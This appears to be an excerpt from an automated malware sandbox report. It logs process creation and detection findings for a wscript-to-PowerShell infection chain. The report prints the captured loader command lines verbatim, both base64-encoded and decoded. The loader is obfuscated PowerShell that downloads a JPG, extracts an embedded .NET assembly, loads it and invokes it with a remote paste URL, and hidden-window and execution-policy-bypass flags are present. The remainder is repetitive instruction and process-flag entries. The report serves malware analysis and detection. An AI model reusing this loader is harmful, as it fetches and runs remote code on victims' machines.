Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))" Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD34777563 push ebx; iretd 4_2_00007FFD3477756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD347771B4 push E95C8F86h; ret 4_2_00007FFD347771E9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_004141F2 push edi; ret 5_2_004141FB
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_004030F0 push eax; ret 5_2_004030F2
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_00401945 push eax; iretd 5_2_00401948
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0041F1EC push ds; ret 5_2_0041F1ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0040222D push ecx; ret 5_2_00402235
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_004014FC push ecx; ret 5_2_004014FE
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0041A583 push ebx; ret 5_2_0041A597
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_00417D86 push eax; iretd 5_2_00417D8E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0041167D push eax; iretd 5_2_0041167E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_004016AB push ecx; ret 5_2_004016C5
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0321225F pushad ; ret 5_2_032127F9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032127FA pushad ; ret 5_2_032127F9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03219939 push es; iretd 5_2_03219940
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032409AD push ecx; mov dword ptr [esp], ecx 5_2_032409B6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0321283D push eax; iretd 5_2_03212858
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 10_2_03043929 pushfd ; iretd 10_2_0304392A
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 10_2_0304DE18 push eax; iretd 10_2_0304DE19
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 10_2_03056D1E push ebx; ret 10_2_03056D32
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 10_2_03054521 push eax; iretd 10_2_03054529
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038109AD push ecx; mov dword ptr [esp], ecx 11_2_038109B6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0309C0F9 push ds; ret 11_2_0309C0FA
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0308E58A push eax; iretd 11_2_0308E58B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03097490 push ebx; ret 11_2_030974A4
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030A0BA6 push es; retf 11_2_030A0BB0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030A0E85 push ebp; retf 11_2_030A0E86
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03094C93 push eax; iretd 11_2_03094C9B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0368A39A pushfd ; ret 11_2_0368A3A6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03695272 push eax; ret 11_2_03695274
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0368C1BD push ebp; ret 11_2_0368C1BE
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
